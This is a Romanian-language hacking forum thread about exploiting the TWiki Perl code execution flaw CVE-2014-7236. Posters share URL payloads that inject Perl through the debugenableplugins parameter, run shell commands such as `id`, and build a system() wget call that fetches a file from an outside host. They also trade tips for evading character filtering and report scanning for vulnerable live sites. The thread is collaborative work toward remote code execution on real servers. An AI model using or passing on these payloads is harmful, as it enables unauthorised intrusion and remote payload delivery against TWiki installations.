Twiki Perl Code Execution

cyadron · October 10, 2014

http://www.example.com/twiki/bin/view/Main/WebHome?debugenableplugins=BackupRestorePlugin%3bprint("Content-Type:text/html\r\n\r\nVulnerable!")%3bexit

The TWiki site is vulnerable if you see a page with text "Vulnerable!".

Source:Twiki Perl Code Execution ? Packet Storm

Acum singura chestie care mai ramane de facut e sa ajungeti la RCE.

Daca are cineva vreo metoda va rog...

Edited October 10, 2014 by cyadron

dancezar · October 10, 2014

SmiliesPlugin%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable!%22.qx/id/%29%3bexit

cyadron · October 10, 2014

Multam dany.

Edited October 10, 2014 by cyadron

icebaby · October 13, 2014

a

Edited May 6, 2016 by icebaby

cyadron · October 13, 2014

Nu uita sa faci escape la caractere precum "/" cu "\". Ex: http:// va deveni http:\/\/

dancezar · October 13, 2014

SmiliesPlugin%3b$link=%22wget%22.chr(32).%22http://site.com/aaaa%22%3bprint%28%22Content-Type:text/html\r\n\r\nVulnerable!%22%29%3bsystem($link)%3bexit

Problema is spatiile...

cyadron · October 13, 2014

poti folosi \t(tab) acolo unde ai nevoie de spatiu

icebaby · October 13, 2014

a

Edited May 6, 2016 by icebaby

florinul · October 14, 2014

da icebaby da nu poti da wget da eraore

[-] Exploit Failed

Htich · October 14, 2014

perl a.pl (access denied) WebHome < Main/WebHome < TWiki "uname -a"

[*] TWiki code execution CVE-2014-7236

[*] m0nad <m0nad/at/email.com>

[-] Exploit Failed

cam nimica nu mai gasesti bun .. rata de vulnerabilitate 1% :))

florinul · October 14, 2014

sunt cateva bune da cand dai wget da expoit faild

Sign In

Twiki Perl Code Execution

Recommended Posts

cyadron

dancezar

cyadron

icebaby

cyadron

dancezar

cyadron

icebaby

florinul

Htich

florinul

Join the conversation

Browse

Activity

Pages